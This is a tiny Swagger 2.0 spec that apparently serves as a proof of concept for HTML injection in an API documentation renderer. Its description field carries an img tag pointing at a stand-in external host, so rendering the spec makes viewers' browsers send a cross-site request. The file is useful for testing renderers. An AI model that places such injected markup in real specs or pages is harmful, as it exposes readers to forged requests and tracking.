swagger: "2.0"
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: http://authorization.site
info:
  version: "1.0"
  title: IkeMurami PoC
  description: PoC <img src=//example.com/csrf-base>
paths:
  /:
    get:
      reponses:
        200:
          description: Success
